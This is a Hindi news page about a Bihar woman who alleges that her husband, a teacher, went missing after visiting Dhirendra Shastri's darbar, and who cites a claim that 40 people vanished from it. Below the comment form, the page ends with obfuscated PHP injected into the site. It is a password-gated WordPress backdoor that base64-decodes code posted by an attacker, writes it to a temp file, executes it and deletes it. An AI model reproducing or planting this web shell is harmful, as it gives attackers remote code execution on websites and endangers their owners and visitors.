महिला का बड़ा आरोप: धीरेंद्र शास्त्री के दरबार में गए मेरे पति हो गए गायब, अब तक गायब हुए 40 लोग?

Uttarakhand Press News, 20 May 2023: Bihar : गायब हुए शिक्षक की पत्नी ने कहा कि मैं बाबा के दरबार में पहुंचे सभी लोगों से अपील करती हूं कि बाबा से पूछे मेरे पति कहां गायब हो गए। आपलोग मेरे सिंदूर की रक्षा करें। उनके दरबार से जो इतने लोग गायब हो रहे हैं, वह मिल क्यों नहीं रहे।

बागेश्वर धाम वाले बाबा के दरबार से लौटी एक महिला ने बड़ा आरोप लगाया है। उसका कहना है कि उसके शिक्षक पति ललन कुमार 4 माह पहले पंडित धीरेंद्र शास्त्री के दरबार में गए थे लेकिन अब तक वापस नहीं आए। काफी खोजबीन की लेकिन नहीं मिले। जब पता चला कि बाबा पटना आ रहे हैं तो अपनी ननद रीता देवी के साथ दरबार में पति की बरामदगी की फरियाद लेकर गई लेकिन कोई फायदा नहीं हुआ। बाबा ने मिलने ही नहीं दिया गया। बता दें कि शिक्षक ललन कुमार (36) दरभंगा में बहेड़ी प्रखंड के बघौनी गांव स्थित वार्ड दो के निवासी हैं।

6 फरवरी से गायब हैं शिक्षक ललन कुमार:
अब ललन कुमार की पत्नी सविता कुमारी ने बिहार सरकार मंत्री और लालू यादव के बड़े बेटे तेज प्रताप यादव से गुहार लगाई है कि बागेश्वर वाले बाबा के दरबार से ही लोग क्यों गायब हो रहे हैं। मेरे पति ने मिलने बागेश्वर धाम गए थे। 6 फरवरी को ही 10:00 बजे के बाद उनका फोन बंद हो गया। फोन बंद होने से पहले पति ने कहा था कि बाबा का दर्शन हो चुका है और दो दिन में वापस घर लौट आऊंगा। सविता ने कहा कि तब से पति का रोज इंतजार कर रही हूं लेकिन वह अब तक घर नहीं लौटे।

अब तक बाबा के दरबार से “40 लोग” गायब हुए:
सविता ने कहा कि मैं बाबा के दरबार में पहुंचे सभी लोगों से अपील करती हूं कि बाबा से पूछे मेरे पति कहां गायब हो गए। आपलोग मेरे सिंदूर की रक्षा करें। उनके दरबार से जो इतने लोग गायब हो रहे हैं, वह मिल क्यों नहीं रहे। मध्यप्रदेश के बरैठा थाना में की रिपोर्ट के अनुसार एक जनवरी से अब तक बाबा के दरबार से 40 लोग गायब हुए। इसमें से 28 लोगों की बरामदगी हुई। ऐसा क्या साजिश हो रहा वहां जो लोग गायब हो रहे हैं। मध्य प्रदेश सरकार से गुजारिश है कि इसकी जांच करवाएं कि वहां से लोग गायब क्यों हो रहे हैं। सविता ने आरोप लगाया कि पटना के दरबार में भी कई लोगों से गुहार लगाई लेकिन किसी ने नहीं सुनी। सविता ने कहा कि हमलोग 4 बार बाबा के दरबार में जा चुके हैं लेकिन वह नहीं मिले।

Read Previous

Haldwani: सड़क किनारे घायल मिला युवक, अस्‍पताल में तोड़ा दम, बहन बोली- हादसा नहीं हत्‍या है

Read Next

दो हजार की नोटबंदी ने ऐसे बिगाड़ा 4 राज्यों के चुनावों का गणित! जाने पूरा मामला…

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}